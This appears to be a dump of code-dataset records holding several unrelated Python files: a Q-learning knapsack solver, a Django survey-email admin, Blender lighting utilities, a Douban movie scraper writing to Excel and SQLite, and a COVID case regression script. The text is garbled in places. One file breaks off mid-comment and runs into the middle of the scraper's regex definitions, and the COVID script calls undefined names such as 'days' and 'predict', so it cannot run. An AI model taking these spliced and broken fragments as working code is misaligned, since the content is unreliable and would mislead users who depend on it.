%(levelname)s %(name)s %(message)s\"\n\t\t},\n\t},\n\t\"handlers\": {\n\t\t\"console\": {\n\t\t\t\"level\": 'DEBUG',\n\t\t\t\"class\": \"logging.StreamHandler\",\n\t\t\t\"stream\": \"ext://sys.stdout\"\n\t\t}\n\t},\n\t\"loggers\": {\n\t\t__name__: {\n\t\t\t\"level\": \"DEBUG\",\n\t\t\t'formatter': 'default',\n\t\t\t\"handlers\": [\"console\"]\n\t\t}\n\t}\n})\n\ndef logger():\n\t# Get the name from the caller of this function\n\treturn logging.getLogger(sys._getframe(1).f_globals['__name__'])\n\t\nlog= logger()\nlog.info('main')\n\n#from include.ttest import test as t1\n\n#t1()\n\nfrom include.gui.ttest import test as t2\n\nt2()","sub_path":"_misc/tlog.py","file_name":"tlog.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"113448416","text":"import pandas as pd\nimport numpy as np\nfrom time import time\nimport itertools\n\nitem = pd.DataFrame(data=[[1, 1], [6, 2], [18, 5], [22, 6], [28, 7]], columns=['Value', 'Weight'])\nactions = list(range(len(item))) # actions 每一個物品是一個action\n\n\ndef check_state(Q, knapsack, actions):\n \"\"\"\n 檢查輸入的背包狀態是否在Q table中, 若無則新增\n 將該column中可執行的action設定為0, 其餘為Nan\n\n :param Q: Q table\n :param knapsack: 背包\n :param actions: 所有可執行的action\n :return: Q table\n \"\"\"\n\n if str(knapsack) not in Q.index: # knapsack表示状态, 例如现在包里有[1,2]\n # append new state to q table\n q_table_new = pd.Series([np.NAN] * len(actions), index=Q.columns, name=str(knapsack))\n # 下面是将能使用的状态设置为0, 不能使用的设置为NaN (这个很重要)\n for i in list(set(actions).difference(set(knapsack))):\n q_table_new[i] = 0\n return Q.append(q_table_new)\n else:\n return Q\n\n\ndef envReward(action, knapsack):\n \"\"\"\n 執行action, 返回reward, 下一步的狀態及done\n done表示是否完成(超過背包限制或所有物品已放完)\n\n :param action: 要執行的action\n :param knapsack: 目前的背包狀態\n :return: r, knapsack_, done\n \"\"\"\n\n limit_w = 11\n knapsack_ = knapsack + [action]\n knapsack_.sort()\n knapsack_w = np.sum([item['Weight'][i] for i in knapsack_]) # 計算目前背包內的物品重量總和\n if knapsack_w > limit_w:\n r = -10\n completed = True\n else:\n if len(knapsack_) == len(item):\n r = 100\n completed = True\n return r, knapsack_, completed\n r = item['Value'][action]\n completed = False\n return r, knapsack_, completed\n\n\ndef mu_policy(Q, epsilon, nA, observation, actions):\n \"\"\"\n epsilon-greedy的策略, 返回每一個動作執行的機率\n\n :param Q: Q table\n :param epsilon: epsilon\n :param nA: 所有動作的數量\n :param observation: 目前背包的狀態\n :param actions: 所有可執行的action\n :return: 每一個動作執行的概率, 一維陣列\n \"\"\"\n # 尚未執行的action\n actions_list = list(set(actions).difference(set(observation)))\n # 輸入的背包狀態中, 所有不同action獲得的累計獎勵\n action_values = Q.loc[str(observation), :]\n # 使用action_values中最大的值\n greedy_action = action_values.idxmax()\n # 設定所有動作執行概率為0\n probabilities = np.zeros(nA)\n # 設定可執行動作執行概率為(1 / len(actions_list)) * epsilon\n for i in actions_list:\n probabilities[i] = (1 / len(actions_list)) * epsilon\n # greedy_action執行概率設定為(1 / len(actions_list)) * epsilon + (1 - epsilon)\n probabilities[greedy_action] = probabilities[greedy_action] + (1 - epsilon)\n return probabilities\n\n\ndef pi_policy(Q, observation):\n \"\"\"\n greedy策略, 每次選擇能獲得最大獎勵的動作\n\n :param Q: Q table\n :param observation: 目前背包的狀態\n :return: 一維陣列, 每個動作出現的概率, 最大獎勵的動作為1\n \"\"\"\n action_values = Q.loc[str(observation), :]\n best_action = action_values.idxmax()\n return np.eye(len(action_values))[best_action]\n\n\ndef qLearning(actions, num_episodes, discount_factor=1.0, alpha=0.7, epsilon=0.2):\n \"\"\"\n Q Learning訓練\n\n :param actions: 所有可執行的action\n :param num_episodes: 訓練的迭代次數\n :param discount_factor: 衰減係數\n :param alpha: learning rate\n :param epsilon: epsilon值, 用於epsilon-greedy選擇當前最大獎勵action\n \"\"\"\n # 環境中所有物品數量\n nA = len(actions)\n\n # 初始化Q table\n Q = pd.DataFrame(columns=actions)\n\n for i_episode in range(1, num_episodes + 1):\n # 開始一輪迭代\n # 開始時背包是空的\n knapsack = []\n\n # 新增Q table column\n Q = check_state(Q, knapsack, actions)\n\n # 從實際執行的policy中選擇action\n action = np.random.choice(nA, p=mu_policy(Q, epsilon, nA, knapsack, actions))\n for t in itertools.count():\n # 執行action, 返回reward, 下一步的狀態及是否完成(超過背包限制或所有物品已放完)\n reward, next_knapsack, done = envReward(action, knapsack)\n if done:\n Q.loc[str(knapsack), action] = reward\n break\n if t > 10:\n break\n\n # 更新Q table 下一步狀態的column\n Q = check_state(Q, next_knapsack, actions)\n # 更新Q table的value\n Q.loc[str(knapsack), action] = Q.loc[str(knapsack), action] + alpha * (\n reward + discount_factor * Q.loc[str(next_knapsack), :].max() - Q.loc[str(knapsack), action])\n\n knapsack = next_knapsack\n # 選擇下一個action\n next_action = np.random.choice(nA, p=mu_policy(Q, epsilon, nA, next_knapsack, actions))\n action = next_action\n\n if i_episode % 50 == 0:\n print(\"\\rEpisode {}/{}. | \".format(i_episode, num_episodes), end=\"\")\n\n return Q\n\n\nif __name__ == '__main__':\n # 訓練\n train_start_time = time()\n Q = qLearning(actions, num_episodes=1000, discount_factor=0.9, alpha=0.3, epsilon=0.1)\n train_finish_time = time()\n print(train_finish_time - train_start_time)\n print(Q)\n\n # 查看最终结果\n actionsList = []\n knapsack = []\n nA = len(actions)\n # 從實際執行的policy中選擇action\n action = np.random.choice(nA, p=pi_policy(Q, knapsack))\n t1 = time()\n for t in itertools.count():\n actionsList.append(action)\n # 執行action, 返回reward, 下一步的狀態及是否完成(超過背包限制或所有物品已放完)\n reward, next_knapsack, done = envReward(action, knapsack)\n if done:\n actionsList.pop()\n count = len(next_knapsack)\n if count >= 5:\n knapsack = next_knapsack\n break\n break\n else:\n # 選擇下一步動作\n next_action = np.random.choice(nA, p=pi_policy(Q, next_knapsack))\n action = next_action\n knapsack = next_knapsack\n t2 = time()\n print(t2 - t1)\n print(knapsack)\n\n","sub_path":"placement_rl.py","file_name":"placement_rl.py","file_ext":"py","file_size_in_byte":6377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529526556","text":"from django.contrib import admin\n\nfrom .models import Jurisdiction, State, SurveyEmail\nfrom mailman.mailer import MailSurvey\n\n\nclass JurisdictionAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'state',\n 'website',\n 'telephone',\n 'email',\n 'city',\n )\n\n list_filter = ('state', 'city',)\n\n search_fields = ('name', 'state__name', 'telephone',)\n\n ordering = ['name']\n\n def changelist_view(self, request, extra_context=None):\n extra_context = {\n 'export_url': '/jurisdictions/emails',\n 'export_caption': 'Download Jurisdiction Emails',\n 'show_export_button': True\n }\n\n return super(JurisdictionAdmin, self).changelist_view(request, extra_context)\n\n\nclass StateAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'alpha',\n 'pollworker_website',\n )\n\n search_fields = ('name', 'alpha',)\n\n ordering = ['name']\n\ndef send_email(modeladmin, request, queryset):\n count_success = 0\n count_resend = 0\n tot_reqs = 0\n for email_req in queryset:\n tot_reqs +=1\n # Only send e-mail once\n if email_req.send_email == False:\n obj_list = email_req.jurisdiction.all()\n jurisdiction_list = []\n for jurisdiction in obj_list:\n jurisdiction_list.append([jurisdiction.name, jurisdiction.pk])\n jurisdiction_list.sort(key=lambda x: x[0])\n\n if ',' in email_req.recipients:\n recipient_list = email_req.recipients.split(',')\n elif '\\r\\n' in email_req.recipients:\n recipient_list = email_req.recipients.split('\\r\\n')\n elif '\\n' in email_req.recipients:\n recipient_list = email_req.recipients.split('\\n')\n elif ';' in email_req.recipients:\n recipient_list = email_req.recipients.split(';')\n else: #assume only one e-mail\n recipient_list = [email_req.recipients]\n \n recipient_list = [item.strip(' ') for item in recipient_list]\n \n # send email\n mail = MailSurvey(jurisdiction_list, recipient_list, email_req.email_text)\n status = mail.send()\n if status == 'OK':\n queryset.update(send_email=True)\n count_success+=1\n else:\n count_resend +=1\n \n message=\"\"\n if count_success > 0:\n message += \"{} out of {} e-mails were successfully sent.\".format(count_success, tot_reqs)\n if count_resend > 0:\n message += '{} out of {} e-mails have already been sent to their recipient. No action has been taken. To force a re-send, set \"Sent E-mail?\" to False'\n modeladmin.message_user(request, message)\n\nsend_email.short_description = \"Send e-mail\"\n\ndef mark_unsent(modeladmin, request, queryset):\n queryset.update(send_email=False)\nmark_unsent.short_description = \"Mark e-mail as not sent\"\n\nclass SurveyEmailAdmin(admin.ModelAdmin):\n list_display = (\n 'name', 'send_email', 'recipients'\n )\n actions = [send_email, mark_unsent]\n def get_readonly_fields(self, request, obj=None):\n return ['send_email']\n\nadmin.site.register(State, StateAdmin)\nadmin.site.register(SurveyEmail, SurveyEmailAdmin)\nadmin.site.register(Jurisdiction, JurisdictionAdmin)\n","sub_path":"apps/jurisdiction/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470579039","text":"import bpy\r\nimport os\r\nimport json\r\nimport bgl\r\nimport gpu\r\nfrom gpu_extras.batch import batch_for_shader\r\nfrom bpy_extras import view3d_utils\r\nfrom mathutils import (\r\n\t\t\t\tVector,\r\n\t\t\t\tMatrix,\r\n\t\t\t\tQuaternion,\r\n\t\t\t\tEuler\r\n\t\t\t\t)\r\nfrom textwrap import wrap\r\nfrom math import (\r\n\tdegrees,\r\n\tradians,\r\n\tsin,\r\n\tcos,\r\n\tsqrt,\r\n\tatan2,\r\n\tacos,\r\n\tpi,\r\n\t)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef raycast_light(self, event, context, range, ray_max=1000.0):\r\n\t\"\"\"Compute the location and rotation of the light from the angle or normal of the targeted face off the object\"\"\"\r\n\tlength_squared = 0\r\n\tscene = context.scene\r\n\tlight = context.active_object\r\n\trv3d = context.region_data\r\n\tregion = context.region\r\n\tcoord = (event.mouse_region_x, event.mouse_region_y)\r\n\r\n#---Get the ray from the viewport and mouse\r\n\t# Direction vector from the viewport to 2d coord\r\n\tview_vector = view3d_utils.region_2d_to_vector_3d(region, rv3d, (coord))\r\n\t# 3d view origin vector from the region\r\n\tray_origin = view3d_utils.region_2d_to_origin_3d(region, rv3d, (coord))\r\n\t# Define a default direction vector\r\n\tray_target = ray_origin + view_vector\r\n\r\n\tdepsgraph = context.evaluated_depsgraph_get()\r\n\t\r\n#---Select the targeted object\r\n\tdef visible_objects_and_duplis():\r\n\t\tif light.Lumiere.target :\r\n\t\t\tobj_trgt = light.Lumiere.target\r\n\t\t\tyield (obj_trgt, obj_trgt.matrix_world.copy())\r\n\t\telse:\r\n\t\t\tfor dup in depsgraph.object_instances:\r\n\t\t\t\tif dup.object.type == 'MESH':\r\n\t\t\t\t\tif dup.object.name not in context.scene.collection.children['Lumiere'].all_objects or \\\r\n\t\t\t\t\t(dup.object.name in context.scene.collection.children['Lumiere'].all_objects and \\\r\n\t\t\t\t\t(dup.object.Lumiere.color_type == 'Reflector' and dup.object.data.name != light.data.name)):\r\n\r\n\t\t\t\t\t\tif dup.is_instance:\r\n\t\t\t\t\t\t\tyield (dup.instance_object, dup.instance_object.matrix_world.copy())\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tyield (dup.object.original, dup.object.original.matrix_world.copy())\r\n\r\n\r\n#---Cast the ray to the targeted object\r\n\tdef obj_ray_cast(obj_trgt, matrix):\r\n\t#---Get the ray direction from the view angle to the targeted object\r\n\t\tmatrix_inv = matrix.inverted()\r\n\t\tray_origin_obj = matrix_inv @ ray_origin\r\n\t\tray_target_obj = matrix_inv @ ray_target\r\n\t\tray_direction_obj = ray_target_obj - ray_origin_obj\r\n\r\n\t#---Cast the ray\r\n\t\tsuccess, hit, normal, face_index = obj_trgt.ray_cast(ray_origin_obj, ray_direction_obj)\r\n\r\n\t\tif success:\r\n\t\t\treturn success, hit, normal\r\n\t\telse:\r\n\t\t\treturn None, None, None\r\n\r\n#---Find the closest object\r\n\t# best_length_squared = ray_max * ray_max\r\n\tbest_length_squared = -1.0\r\n\tbest_obj = None\r\n\r\n#---Find the position of the light using the reflect angle and the object targeted normal\r\n\tfor obj_trgt, matrix_trgt in visible_objects_and_duplis():\r\n\t\tsuccess, hit, normal = obj_ray_cast(obj_trgt, matrix_trgt)\r\n\r\n\t\tif success is not None :\r\n\t\t\t# Get the normal of the face from the targeted object\r\n\t\t\tnormal = matrix_trgt.to_3x3().inverted().transposed() @ normal\r\n\t\t\tnormal.normalize()\r\n\r\n\t\t#---Define the direction based on the normal of the targeted object, the view angle or the bounding box\r\n\t\t\tif light.Lumiere.reflect_angle == \"0\":\r\n\t\t\t\tself.reflect_angle = \"Accurate\"\r\n\t\t\t\treflect_dir = (view_vector).reflect(normal)\r\n\t\t\telif light.Lumiere.reflect_angle == \"1\":\r\n\t\t\t\tself.reflect_angle = \"Normal\"\r\n\t\t\t\tif obj_trgt.name in context.scene.collection.children['Lumiere'].all_objects:\r\n\t\t\t\t\treflect_dir = -normal\r\n\t\t\t\telse:\r\n\t\t\t\t\treflect_dir = normal\r\n\r\n\t\t\telif light.Lumiere.reflect_angle == \"2\":\r\n\t\t\t\tself.reflect_angle = \"Estimated\"\r\n\t\t\t\tif light.Lumiere.auto_bbox_center:\r\n\t\t\t\t\tlocal_bbox_center = 0.125 * sum((Vector(b) for b in obj_trgt.bound_box), Vector())\r\n\t\t\t\t\tglobal_bbox_center = obj_trgt.matrix_world @ local_bbox_center\r\n\t\t\t\telse:\r\n\t\t\t\t\tglobal_bbox_center = Vector(light.Lumiere.bbox_center)\r\n\t\t\t\treflect_dir = (matrix_trgt @ hit) - global_bbox_center\r\n\t\t\t\treflect_dir.normalize()\r\n\r\n\t\t#---Define light location : Hit + Direction + Range\r\n\t\t\tlight_loc = (matrix_trgt @ hit) + (reflect_dir * range)\r\n\r\n\t\t\tlength_squared = ((matrix_trgt @ hit) - ray_origin).length_squared\r\n\r\n\t\t\tif best_obj is None or length_squared < best_length_squared:\r\n\t\t\t\tbest_obj = obj_trgt\r\n\t\t\t\tbest_length_squared = length_squared\r\n\t\t\t\t_matrix_trgt = matrix_trgt\r\n\t\t\t\t_hit = hit\r\n\t\t\t\t_light_loc = light_loc\r\n\t\t\t\t_direction = reflect_dir\r\n\r\n\t\t\t\tif light.Lumiere.reflect_angle == \"2\":\r\n\t\t\t\t\tlight.Lumiere.bbox_center = global_bbox_center\r\n\t\t\t#---Parent the light to the target object\r\n\t\t\t\tlight.parent = obj_trgt\r\n\t\t\t\tlight.matrix_parent_inverse = matrix_trgt.inverted()\r\n\r\n#---Define location, rotation and scale\r\n\tif length_squared > 0 :\r\n\t\tif self.shift :\r\n\t\t\ttrack = light.location - Vector(_matrix_trgt @ _hit)\r\n\t\t\trotaxis = (track.to_track_quat('Z','Y')).to_euler()\r\n\t\telse :\r\n\t\t\trotaxis = (_direction.to_track_quat('Z','Y')).to_euler()\r\n\t\t\tlight.location = Vector((_light_loc[0], _light_loc[1], _light_loc[2]))\r\n\r\n\t\tlight.Lumiere.hit = (_matrix_trgt @ _hit)\r\n\r\n#---Update rotation and pitch for spherical coordinate\r\n\t\tx,y,z = light.location - Vector((light.Lumiere.hit))\r\n\t\tr = sqrt(x**2 + y**2 + z**2)\r\n\t\ttheta = atan2(y, x)\r\n\t\tif degrees(theta) < 0:\r\n\t\t\ttheta = radians(degrees(theta) + 360)\r\n\t\tlight.Lumiere.rotation = degrees(theta)\r\n\t\tphi = acos( z / r )\r\n\t\tlight.Lumiere.pitch = degrees(phi)\r\n\r\n\t\tlight.Lumiere.direction = _direction\r\n\t\tlight.rotation_euler = rotaxis\r\n\r\n# -------------------------------------------------------------------- #\r\ndef create_2d_circle(step, radius, rotation = 0, center_x=0, center_y=0):\r\n\t\"\"\" Create the vertices of a 2d circle at (0,0) \"\"\"\r\n\t#https://stackoverflow.com/questions/8487893/generate-all-the-points-on-the-circumference-of-a-circle\r\n\tindices = []\r\n\r\n\tverts = [(center_x, center_y)] + [(\r\n\t\t\tcos(2*pi / step*x + rotation)*radius + center_x,\r\n\t\t\tsin(2*pi / step*x + rotation)*radius + center_y\r\n\t\t\t) for x in range(0, step+1)]\r\n\r\n\tfor idx in range(len(verts) - 1):\r\n\t\ti1 = idx+1\r\n\t\ti2 = idx+2 if idx+2 <= step else 1\r\n\t\tindices.append((0,i1,i2))\r\n\r\n\treturn(verts, indices)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef draw_circle(center_circle, radius_circle, steps):\r\n\t\"\"\" Return the coordinates + indices of a circle using a triangle fan \"\"\"\r\n\tindices = []\r\n\tcenter_x, center_y = center_circle\r\n\tradiusx = radius_circle[0] - center_circle[0]\r\n\tradiusy = radius_circle[1] - center_circle[1]\r\n\tradius = sqrt(radiusx**2 + radiusy**2)\r\n\trotation = radians(radius_circle[1] - center_circle[1]) / 2\r\n\t# steps = int(360 / steps)\r\n\r\n\t# Get the vertices of a 2d circle\r\n\tverts, indices = create_2d_circle(steps, radius, rotation, center_x, center_y)\r\n\r\n\treturn(verts, indices)\r\n\r\n\r\n# -------------------------------------------------------------------- #\r\ndef draw_shader(self, color, alpha, type, coords, size=1, indices=None):\r\n\t\"\"\" Create a batch for a draw type \"\"\"\r\n\tbgl.glEnable(bgl.GL_BLEND)\r\n\tbgl.glEnable(bgl.GL_LINE_SMOOTH)\r\n\tbgl.glPointSize(size)\r\n\tbgl.glLineWidth(size)\r\n\ttry:\r\n\t\tif len(coords[0])>2:\r\n\t\t\tshader = gpu.shader.from_builtin('3D_UNIFORM_COLOR')\r\n\t\telse:\r\n\t\t\tshader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')\r\n\t\tbatch = batch_for_shader(shader, type, {\"pos\": coords}, indices=indices)\r\n\t\tshader.bind()\r\n\t\tshader.uniform_float(\"color\", (color[0], color[1], color[2], alpha))\r\n\t\tbatch.draw(shader)\r\n\t\tbgl.glLineWidth(1)\r\n\t\tbgl.glPointSize(1)\r\n\t\tbgl.glDisable(bgl.GL_LINE_SMOOTH)\r\n\t\tbgl.glDisable(bgl.GL_BLEND)\r\n\texcept:\r\n\t\texc_type, exc_value, exc_traceback = sys.exc_info()\r\n\t\tself.report({'ERROR'}, str(exc_value))\r\n\r\n# -------------------------------------------------------------------- #\r\ndef export_props_light(self, context):\r\n\t\"\"\"Export the current light data in JSON format\"\"\"\r\n\tlumiere_dict = {}\r\n\tlight = context.active_object\r\n\r\n\tlumiere_dict[light.name] = {}\r\n\tlumiere_dict[light.name]['Lumiere'] = light['Lumiere'].to_dict()\r\n\tlumiere_dict[light.name]['Lumiere']['light_type'] = light.Lumiere.light_type\r\n\tlumiere_dict[light.name]['rotation'] = tuple(light.matrix_world.to_euler())\r\n\tlumiere_dict[light.name]['scale'] = tuple(light.scale)\r\n\tlumiere_dict[light.name]['location'] = tuple(light.location)\r\n\tlumiere_dict[light.name]['Lumiere']['definition'] = list(wrap(light['Lumiere']['definition'], 50)) if \"definition\" in light['Lumiere'] else \" \"\r\n\r\n\t# lumiere_dict[light.name]['group'] = {}\r\n\t# for group in bpy.data.objects[light.name].users_group :\r\n\t# \t# lumiere_dict[light.name]['group'] = {group.name : list(wrap(group[\"Lumiere\"][\"definition\"], 50))} if \"definition\" in group[\"Lumiere\"] else {group.name : \" \"}\r\n\t# \tlumiere_dict[light.name]['group'].update({group.name : list(wrap(group['Lumiere']['definition'], 50))} if \"definition\" in group['Lumiere'] else {group.name : \" \"})\r\n\r\n\tmat = get_mat_name()\r\n\tif light.type == \"LAMP\":\r\n\t\tlamp = get_lamp(context, light.data.name)\r\n\t\tlumiere_dict[light.name]['smooth'] = light.data.node_tree.nodes[\"Light Falloff\"].inputs[1].default_value\r\n\telse:\r\n\t\tlumiere_dict[light.name]['smooth'] = mat.node_tree.nodes['Light Falloff'].inputs[1].default_value\r\n\r\n\t#---Gradient\r\n\t\tif light.Lumiere.color_type in (\"Linear\", \"Spherical\"):\r\n\t\t\t# lumiere_dict[light.name]['repeat'] = mat.node_tree.nodes['Math'].inputs[1].default_value\r\n\t\t\tcolramp = mat.node_tree.nodes['ColorRamp'].color_ramp\r\n\t\t\tlumiere_dict[light.name]['gradient'] = {}\r\n\t\t\tlumiere_dict[light.name]['interpolation'] = colramp.interpolation\r\n\t\t\tfor i in range(len(colramp.elements)):\r\n\t\t\t\tlumiere_dict[light.name]['gradient'].update({colramp.elements[i].position: colramp.elements[i].color[:]})\r\n\r\n\treturn(lumiere_dict)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef get_mat_name():\r\n\t\"\"\"Return the name of the material of the light\"\"\"\r\n\tlight = bpy.context.object\r\n\tif bpy.context.object.type == 'MESH':\r\n\t\tmat = light.active_material\r\n\telse:\r\n\t\tmat = bpy.data.lights[light.data.name].name\r\n\r\n\treturn(mat)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef get_lumiere_dict():\r\n\t\"\"\"Return the file of the exported lights in a dict format\"\"\"\r\n\r\n\tcurrent_file_dir = os.path.dirname(__file__)\r\n\tfile_name = os.path.join(current_file_dir, \"lumiere_dictionary.json\")\r\n\r\n\t#---Try to open the Lumiere export dictionary\r\n\ttry:\r\n\t\twith open(file_name, 'r', encoding='utf-8') as file:\r\n\t\t\tmy_dict = json.loads(file.read())\r\n\t\t\tfile.close()\r\n\texcept :\r\n\t\t# print(\"\\n[Lumiere ERROR]\\n\")\r\n\t\t# import traceback\r\n\t\t# traceback.print_exc()\r\n\t\tmy_dict = {}\r\n\treturn(my_dict)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef update_lumiere_dict(my_dict):\r\n\t\"\"\"Update the file of the exported lights\"\"\"\r\n\tcurrent_file_dir = os.path.dirname(__file__)\r\n\r\n\twith open(current_file_dir + \"\\\\\" + \"lumiere_dictionary.json\", \"w\", encoding='utf-8') as file:\r\n\t\tjson.dump(my_dict, file, sort_keys=True, indent=4, ensure_ascii=False)\r\n\tfile.close()\r\n","sub_path":"lumiere_utils.py","file_name":"lumiere_utils.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"591791107","text":"from sklearn.utils import resample\nimport pandas as pd\nimport os\nimport numpy as np\nimport sys\n# We want to work in ../data/
')\nfindRating = re.compile(r'(.*)')\nfindJudge = re.compile(r'(\\d*)人评价')\nfindInq = re.compile(r'(.*)')\nfindBd = re.compile(r'

(.*?)

', re.S)\n\n\ndef main():\n baseurl = \"https://movie.douban.com/top250?start=\"\n # 1.爬取网页\n datalist = getData(baseurl)\n dbpath = \".\\\\豆瓣电影Top250.xls\"\n dbpath1 = \".\\\\MovieTop250.db\"\n # 3.保存数据\n saveData(datalist, dbpath) # 保存到excel\n saveDataDB(datalist, dbpath1) # 保存到数据库\n\n\n# 爬取网页\ndef getData(baseurl):\n datalist = []\n for i in range(0, 10):\n url = baseurl + str(i * 25)\n html = askURL(url)\n # 2.逐一解析数据\n soup = BeautifulSoup(html, \"html.parser\")\n for item in soup.find_all('div', class_=\"item\"):\n # print(item)\n data = []\n item = str(item)\n\n # 获取影片详情链接\n link = re.findall(findLink, item)[0] # re库用来通过正则表达式查找指定的字符串\n data.append(link)\n\n imgSrc = re.findall(findImgSrc, item)[0] # [0]找第一个\n data.append(imgSrc)\n\n titles = re.findall(findTitle, item) # 可有英文名\n if (len(titles) == 2):\n ctitle = titles[0] # 中文\n data.append(ctitle)\n otitle = titles[1].replace(\"/\", \"\") # 外国\n otitle = re.sub('\\xa0', \"\", otitle) # 去掉\\xa0\n data.append(otitle)\n else:\n data.append(titles[0])\n data.append(' ')\n\n rating = re.findall(findRating, item)[0]\n data.append(rating)\n\n judgeNum = re.findall(findJudge, item)[0]\n data.append(judgeNum)\n\n inq = re.findall(findInq, item)\n if len(inq) != 0:\n inq = inq[0].replace(\".\", \"\")\n inq = re.sub('\\xa0', \"\", inq)\n data.append(inq)\n else:\n data.append(' ')\n\n db = re.findall(findBd, item)[0]\n db = re.sub('\\xa0', \"\", db)\n db = re.sub('(\\s+)?', \" \", db) # 去掉
\n db = re.sub('/', \" \", db) # 替换/\n data.append(db.strip()) # 去掉前后空格\n datalist.append(data)\n # for item in datalist:\n # print(item)\n return datalist\n\n\n# 得到一个指定url的网页内容\ndef askURL(url):\n head = { # 模拟服务器头部信息,向豆瓣服务器发送消息\n \"User-Agent\": \"Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 87.0.4280.88Safari / 537.36\"\n }\n\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode(\"utf-8\")\n # print(html)\n except urllib.error.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n return html\n\n\n# 保存数据到excel\ndef saveData(datalist, dbpath):\n # pass #pass占位无实际意义方便后期加入代码、调试等\n workbook = xlwt.Workbook(encoding=\"utf-8\") # 创建Workbook对象\n worksheet = workbook.add_sheet('豆瓣电影Top250', cell_overwrite_ok=True) # 创建工作表\n col = (\"电影详情链接\", \"图片链接\", \"影片中文名\", \"影片外国名\", \"评分\", \"评价数\", \"概况\", \"相关信息\")\n\n for i in range(0, 8):\n worksheet.write(0, i, col[i]) # 列名(行,列,内容)\n for i in range(0, 250):\n # print(\"第%d条\" %(i+1)\n data = datalist[i]\n for j in range(0, 8):\n worksheet.write(i + 1, j, data[j])\n workbook.save(dbpath)\n print(\"数据已存储到:\" + dbpath)\n\n\n# 保存数据到数据库\ndef saveDataDB(datalist, dbpath):\n init_db(dbpath)\n coon = sqlite3.connect(dbpath)\n cursor = coon.cursor()\n\n for data in datalist:\n for index in range(len(data)):\n if index == 4 or index == 5:\n continue\n data[index] = '\"' + data[index] + '\"'\n sql = '''\n INSERT INTO movieTop250 (\n info_link, pic_link, cname, ename, \n score, rated, instroduction, info\n ) \n VALUES (%s)''' % \",\".join(data)\n\n cursor.execute(sql)\n coon.commit()\n print(\"数据已存储到:\" + dbpath)\n cursor.close()\n coon.close()\n\n\n# 初始化创建数据库\ndef init_db(dbpath):\n sql = '''\n create table movieTop250(\n id integer primary key autoincrement,\n info_link text,\n pic_link text,\n cname varchar,\n ename varchar,\n score numeric,\n rated numeric,\n instroduction text,\n info text\n )\n '''\n conn = sqlite3.connect(dbpath) # 建立连接\n cursor = conn.cursor() # 创建游标\n cursor.execute(sql) # 执行sql语句\n conn.commit() # 提交sql操作\n cursor.close() # 关闭游标\n conn.close() # 关闭数据库\n\n\nif __name__ == \"__main__\": # 当程序执行时(程序入口类似int main(){})\n # 调用函数\n main()\n print(\"爬取完毕\")\n","sub_path":"Python/DoubanTop250/Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"361653133","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\nfrom sklearn import linear_model\n\n\ndef print_list(lst: list):\n for element in lst:\n print(element)\n\n\nbase_path = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data' \\\n '/csse_covid_19_time_series/'\nconfirmed_data_path = base_path + 'time_series_covid19_confirmed_global.csv'\nrecovered_data_path = base_path + 'time_series_covid19_recovered_global.csv'\n\ndata = pd.read_csv(confirmed_data_path)\n\nmean = data.iloc[0:, 4:170].values.mean()\ndata_x = data.iloc[0:, 4:169].values / mean\ndata_y = data.iloc[0:, 5:170].values / mean\n\nreg = linear_model.LinearRegression()\nreg.fit(list(map(lambda x: [x], data_x.flatten())), data_y.flatten())\n\nprint((reg.predict([[969]]) - 981) / 981)\nprint((reg.predict([[922853]]) - 927745) / 927745)\nprint((reg.predict([[1285084]]) - 1298718) / 1298718)\n\n\n# проверяем точность модели\ndata_x = data.iloc[0:, 169:-1].values.flatten()\ndata_y = data.iloc[0:, 170:].values.flatten()\ntotal_m = 0\nfor i in range(0, len(data_x)):\n if data_y[i] == data_x[i] == 0:\n continue\n if ((data_y[i] - data_x[i]) / data_y[i]) > 0.1:\n continue\n p = reg.predict([[data_x[i]]])\n m = abs(p - data_y[i]) / data_y[i]\n if m > 0.012:\n total_m += m[0]\n plt.plot(i, total_m, 'r.')\nprint('Total mistake:', total_m)\nplt.ylabel('Total mistake')\nplt.show()\n\n# ищем аномалии\nfor i in range(0, len(data_x)):\n if data_y[i] == data_x[i] == 0:\n continue\n m = (data_y[i] - data_x[i]) / data_y[i]\n if m > 0.1:\n plt.plot(i, m, 'r.')\n print(\"i=%d %d - %d = |%r|\" % (i, data_x[i], data_y[i], m))\nplt.ylabel('Data breaks')\nplt.show()\n\ns = 220\nresult = list()\nfor i in range(0, days):\n n = reg.predict([[s]])[0]\n result.append(int(n))\n s = n\n\nconfirmed = predict(confirmed_data_path, 100)\nrecovered = predict(recovered_data_path, 100)\n\nprint_list(confirmed)\n# print('-----------------------------------------------')\n# print_list(recovered)\n\ndata = pd.read_csv(confirmed_data_path)\nfor d in range(171, 267):\n data.iloc[0:, d]\n print((reg.predict([[969]]) - 981) / 981)\n","sub_path":"prophet_linear.py","file_name":"prophet_linear.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"439386955","text":"from tkinter import *\nfrom tkinter import 